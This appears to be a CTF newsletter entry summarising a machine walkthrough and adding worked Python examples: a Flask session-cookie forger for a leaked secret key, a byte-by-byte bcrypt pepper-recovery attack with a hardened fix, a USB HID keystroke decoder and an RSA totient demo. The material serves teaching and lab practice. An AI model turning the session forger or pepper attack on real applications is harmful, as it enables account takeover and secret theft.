Newsletter 22/02/2023
This machine has a website that is vulnerable to user enumeration. With a valid username we can brute-force that user's password, log in and run containers. From inside a container we can reach an internal website whose API leaks sensitive information through a Type Juggling flaw and offers a feature that matches regular expressions against given files, which lets us read source code and obtain the secret key of the Flask application. With that key we can forge a session for user jack, and we find out that the Docker containers can access process information from the host, which lets us read this user's private SSH key. Next, we can run a custom Python interpreter and escape its sandbox to get a shell as jack_adm. Finally, there is a tool that generates hashes with bcrypt, and we need to exploit a limitation of bcrypt (it only hashes the first 72 bytes of its input) to extract a secret pepper string and then crack root's hash in order to escalate privileges.
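Forging a Flask session once the secret key is known, as an added example that is not part of the original writeup. It reimplements in plain Python the scheme Flask's SecureCookieSessionInterface delegates to itsdangerous' URLSafeTimedSerializer (salt `cookie-session`, HMAC-SHA1 key derivation, URL-safe base64 payload with optional zlib compression, a timestamp and the signature) so that it runs without Flask installed. The secret key and the session contents are constructed for the demonstration; on the machine the key is whatever the regex-matching feature reads out of the application source.

```python
from __future__ import annotations

import base64
import hashlib
import hmac
import json
import time
import zlib

# Flask's SecureCookieSessionInterface builds an itsdangerous URLSafeTimedSerializer
# with this salt, key_derivation="hmac" and SHA-1 as the digest
SALT = b"cookie-session"


def _b64encode(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")  # itsdangerous strips the padding


def _b64decode(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _signature(secret_key: bytes, value: bytes) -> bytes:
    # key_derivation="hmac": the signing key is HMAC-SHA1(secret_key, salt) ...
    derived = hmac.new(secret_key, SALT, hashlib.sha1).digest()
    # ... and the signature is HMAC-SHA1(derived, "payload.timestamp")
    return _b64encode(hmac.new(derived, value, hashlib.sha1).digest())


def _split(cookie: str) -> tuple[bytes, bytes, bytes, bytes]:
    # Split from the right: a compressed payload itself starts with "."
    value, sig = cookie.encode().rsplit(b".", 1)
    payload, ts = value.rsplit(b".", 1)
    return payload, ts, sig, value


def forge_session(secret_key: bytes, session: dict, timestamp: int | None = None) -> str:
    """Build a cookie the server will accept for `session` (what an attacker does with a leaked key)."""
    raw = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(raw)
    # itsdangerous compresses when that saves space and marks it with a leading "."
    if len(compressed) < len(raw) - 1:
        payload = b"." + _b64encode(compressed)
    else:
        payload = _b64encode(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    value = payload + b"." + _b64encode(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    return (value + b"." + _signature(secret_key, value)).decode()


def decode_session(cookie: str) -> dict:
    """The cookie is signed, not encrypted: its contents are readable without the key."""
    payload = _split(cookie)[0]
    if payload.startswith(b"."):
        return json.loads(zlib.decompress(_b64decode(payload[1:])))
    return json.loads(_b64decode(payload))


def verify_session(secret_key: bytes, cookie: str, max_age: int | None = None,
                   now: int | None = None) -> dict | None:
    """What the server does on each request; None for a malformed, tampered or expired cookie."""
    try:
        payload, ts, sig, value = _split(cookie)
    except ValueError:
        return None
    if not hmac.compare_digest(_signature(secret_key, value), sig):
        return None
    issued = int.from_bytes(_b64decode(ts), "big")
    if max_age is not None and (int(time.time()) if now is None else now) - issued > max_age:
        return None
    return decode_session(cookie)


if __name__ == "__main__":
    key = b"leaked-flask-secret"  # constructed; stands for the key read out of the app source
    cookie = forge_session(key, {"logged_in": True, "username": "jack"}, timestamp=1677024000)
    print(cookie)
    print(verify_session(key, cookie, max_age=31 * 24 * 3600, now=1677024001))
```

Because the payload is only signed, `decode_session` works on any captured cookie and shows which fields the application trusts before the key is even known; the key itself can be brute-forced against a captured cookie with a wordlist (that is what flask-unsign does) or, as on this machine, read straight from the source.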
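The pepper-extraction step, as an added example rather than code from the writeup. bcrypt only hashes the first 72 bytes of its input, so if a service computes bcrypt(password + pepper) and hands back the hash, a password of 71 bytes leaves exactly one pepper byte inside the hashed window, and that byte can be brute-forced offline against the returned hash; every recovered byte shortens the next password by one and exposes the following byte. To run without the bcrypt package, `hashpw`/`checkpw` below are stand-ins that keep only the properties the attack relies on (salted, offline-verifiable, truncated at 72 bytes); the `HashTool` class, its pepper and the hardened variant are constructed for this example. With the real library the same loop uses `bcrypt.hashpw` on the service side and `bcrypt.checkpw` for the guesses.

```python
from __future__ import annotations

import hashlib
import hmac
import os
import string

BCRYPT_INPUT_LIMIT = 72  # bcrypt hashes only the first 72 bytes of its input; the rest is silently dropped


def hashpw(password: bytes, salt: bytes) -> bytes:
    """Stand-in for bcrypt.hashpw, constructed for this example.

    Keeps the two properties the attack needs: a salt embedded in the output and
    truncation of the input to 72 bytes. Not bcrypt itself.
    """
    return salt + hmac.new(salt, password[:BCRYPT_INPUT_LIMIT], hashlib.sha256).digest()


def checkpw(password: bytes, hashed: bytes) -> bool:
    """Stand-in for bcrypt.checkpw: recompute with the embedded salt and compare."""
    return hmac.compare_digest(hashpw(password, hashed[:16]), hashed)


class HashTool:
    """Models the target's generator: appends a secret pepper and returns only the hash."""

    def __init__(self, pepper: bytes):
        self._pepper = pepper  # never returned to the caller

    def generate(self, password: bytes) -> bytes:
        return hashpw(password + self._pepper, os.urandom(16))


class HardenedHashTool(HashTool):
    """Same interface, but the pepper keys a pre-hash, so the bcrypt input is a fixed 64 bytes."""

    def generate(self, password: bytes) -> bytes:
        prehash = hmac.new(self._pepper, password, hashlib.sha256).hexdigest().encode()
        return hashpw(prehash, os.urandom(16))


def recover_pepper(tool: HashTool, alphabet: bytes = string.printable.encode(),
                   filler: bytes = b"A") -> bytes | None:
    """Recover the pepper byte by byte through the 72-byte window; None if the trick does not work."""
    known = b""
    while len(known) < BCRYPT_INPUT_LIMIT:
        # 71 - len(known) filler bytes leave room for the known prefix plus ONE unknown pepper byte
        password = filler * (BCRYPT_INPUT_LIMIT - 1 - len(known))
        hashed = tool.generate(password)
        # If the hash already verifies with just the known prefix, nothing is truncated any more: done
        if checkpw(password + known, hashed):
            return known
        for c in alphabet:  # one verification per candidate, all offline against the returned hash
            if checkpw(password + known + bytes([c]), hashed):
                known += bytes([c])
                break
        else:
            return None  # no candidate matched: byte outside the alphabet, or no truncation to abuse
    return known


if __name__ == "__main__":
    print(recover_pepper(HashTool(b"s3cret-p3pper!")))      # the pepper, one byte per round
    print(recover_pepper(HardenedHashTool(b"s3cret-p3pper!")))  # None: pre-hashing closes the window
```

The hardened variant shows the usual fix: never let user-controlled length reach bcrypt's 72-byte window, either by pre-hashing (password and pepper mixed through a keyed hash of fixed length) or by rejecting long inputs outright. Appending the pepper is exactly the wrong order, since the attacker controls how much of it survives truncation.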
USB HID analysis. Decoding keystrokes
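A keystroke decoder for USB HID captures, as an added example that is not taken from the post. It consumes the 8-byte boot-protocol keyboard reports as exported from a pcap (modifier byte, reserved byte, up to six key usage IDs), maps the usage IDs onto a US layout, and handles the cases that trip up a naive decoder: a held key repeated across reports, Shift and Caps Lock, Backspace and Delete, and cursor movement with the arrow keys. The sample report lines are constructed.

```python
from __future__ import annotations

from typing import Iterable

# HID usage ID -> (unshifted, shifted) for a US keyboard layout
KEYMAP: dict[int, tuple[str, str]] = {}
for i, ch in enumerate("abcdefghijklmnopqrstuvwxyz"):
    KEYMAP[0x04 + i] = (ch, ch.upper())
for i, (lo, hi) in enumerate(zip("1234567890", "!@#$%^&*()")):
    KEYMAP[0x1E + i] = (lo, hi)
KEYMAP.update({
    0x28: ("\n", "\n"), 0x2B: ("\t", "\t"), 0x2C: (" ", " "),
    0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"), 0x30: ("]", "}"),
    0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'), 0x35: ("`", "~"),
    0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?"),
})
BACKSPACE, CAPS_LOCK, DELETE, RIGHT, LEFT = 0x2A, 0x39, 0x4C, 0x4F, 0x50
SHIFT_MASK = 0x22  # left shift (0x02) or right shift (0x20) in the modifier byte


def parse_report(line: str) -> tuple[int, list[int]] | None:
    """Accept '0000040000000000' or '00:00:04:00:00:00:00:00'; skip anything that is not an 8-byte keyboard report."""
    raw = bytes.fromhex(line.strip().replace(":", ""))
    if len(raw) < 8:
        return None
    return raw[0], [k for k in raw[2:8] if k]


def decode_keystrokes(capdata_lines: Iterable[str]) -> str:
    buf: list[str] = []
    cursor = 0
    caps = False
    held: set[int] = set()
    for line in capdata_lines:
        report = parse_report(line)
        if report is None:
            continue
        modifiers, keys = report
        shift = bool(modifiers & SHIFT_MASK)
        for key in keys:
            if key in held:
                continue  # still down from the previous report: not a new keystroke
            if key == CAPS_LOCK:
                caps = not caps
            elif key == BACKSPACE:
                if cursor:
                    cursor -= 1
                    del buf[cursor]
            elif key == DELETE:
                if cursor < len(buf):
                    del buf[cursor]
            elif key == LEFT:
                cursor = max(0, cursor - 1)
            elif key == RIGHT:
                cursor = min(len(buf), cursor + 1)
            elif key in KEYMAP:
                lo, hi = KEYMAP[key]
                upper = shift != (caps and lo.isalpha())  # Caps Lock only affects letters
                buf.insert(cursor, hi if upper else lo)
                cursor += 1
        held = set(keys)
    return "".join(buf)


# Constructed sample: types "flag{H", fixes the typo, and inserts the "3" with the arrow keys
SAMPLE_CAPDATA = [
    "0000090000000000", "0000000000000000",                      # f
    "00000f0000000000", "0000000000000000",                      # l
    "0000040000000000", "0000000000000000",                      # a
    "00000a0000000000", "0000000000000000",                      # g
    "02002f0000000000", "0000000000000000",                      # Shift + [ -> {
    "20000b0000000000", "0000000000000000",                      # Right Shift + h -> H (typo)
    "00002a0000000000", "0000000000000000",                      # Backspace
    "00000b0000000000", "00000b0000000000", "0000000000000000",  # h, reported twice while held
    "00001e0000000000", "0000000000000000",                      # 1
    "0000070000000000", "0000000000000000",                      # d
    "02002d0000000000", "0000000000000000",                      # Shift + - -> _
    "00000e0000000000", "0000000000000000",                      # k
    "00001c0000000000", "0000000000000000",                      # y
    "0000160000000000", "0000000000000000",                      # s
    "0000500000000000", "0000000000000000",                      # Left
    "0000500000000000", "0000000000000000",                      # Left
    "0000200000000000", "0000000000000000",                      # 3, inserted before "ys"
    "00004f0000000000", "0000000000000000",                      # Right
    "00004f0000000000", "0000000000000000",                      # Right
    "0200300000000000", "0000000000000000",                      # Shift + ] -> }
    "0000280000000000", "0000000000000000",                      # Enter
    "00000000",                                                  # 4-byte non-keyboard report: skipped
]

if __name__ == "__main__":
    print(repr(decode_keystrokes(SAMPLE_CAPDATA)))
```

The input lines are what `tshark -r capture.pcap -Y 'usb.transfer_type == 0x01 && usb.capdata' -T fields -e usb.capdata` prints; newer Wireshark builds dissect the HID payload as `usbhid.data` instead, which feeds in the same way. Filtering on the keyboard's device address first avoids mixing in reports from other interrupt endpoints.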
RSA. Euler's totient function. AES decryption
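Since the entry gives no details of the challenge, here is a generic worked example of the totient step (added here, not the post's own code): compute phi(n) from the factorization, derive the private exponent, decrypt, and run the computation the other way as well, recovering p and q from n and a leaked phi(n). The primes, the exponent and the message are constructed for the example; the AES step that such challenges usually chain after the RSA plaintext needs an AES library and is not reproduced here.

```python
from math import gcd, isqrt

# Constructed parameters: two Mersenne primes and the usual public exponent
P = 2**31 - 1
Q = 2**61 - 1
E = 65537


def euler_phi(factorization: dict) -> int:
    """phi(n) from the prime factorization {p: k} of n: the product of p^(k-1) * (p - 1)."""
    phi = 1
    for p, k in factorization.items():
        phi *= p ** (k - 1) * (p - 1)
    return phi


def rsa_private_exponent(e: int, phi: int) -> int:
    """d = e^-1 mod phi(n); it exists only when gcd(e, phi(n)) == 1."""
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible modulo phi(n)")
    return pow(e, -1, phi)


def rsa_encrypt(m: int, e: int, n: int) -> int:
    return pow(m, e, n)


def rsa_decrypt(c: int, d: int, n: int) -> int:
    return pow(c, d, n)


def factor_from_phi(n: int, phi: int) -> tuple:
    """Recover p and q from n = p*q and phi(n) = (p-1)(q-1).

    phi = n - (p + q) + 1, so s = p + q = n - phi + 1 and p, q are the roots of x^2 - s*x + n.
    """
    s = n - phi + 1
    disc = s * s - 4 * n
    if disc < 0:
        raise ValueError("phi does not match a two-prime modulus")
    r = isqrt(disc)
    if r * r != disc:
        raise ValueError("phi does not match a two-prime modulus")
    p, q = (s - r) // 2, (s + r) // 2
    if p * q != n:
        raise ValueError("recovered factors do not multiply to n")
    return p, q


def int_to_bytes(m: int) -> bytes:
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def demo() -> bytes:
    """Full round trip with the constructed parameters; returns the recovered plaintext bytes."""
    n = P * Q
    phi = euler_phi({P: 1, Q: 1})  # (P - 1) * (Q - 1)
    d = rsa_private_exponent(E, phi)
    m = int.from_bytes(b"totient", "big")  # constructed message, smaller than n
    c = rsa_encrypt(m, E, n)
    assert factor_from_phi(n, phi) == (P, Q)  # knowing phi(n) is as good as knowing the factors
    return int_to_bytes(rsa_decrypt(c, d, n))


if __name__ == "__main__":
    print(demo())
```

`factor_from_phi` is the practical point of the totient in a CTF: a challenge that leaks phi(n), d, or any multiple of phi(n) has given away the factorization, and a modulus with a repeated or extra prime factor just changes the `euler_phi` argument.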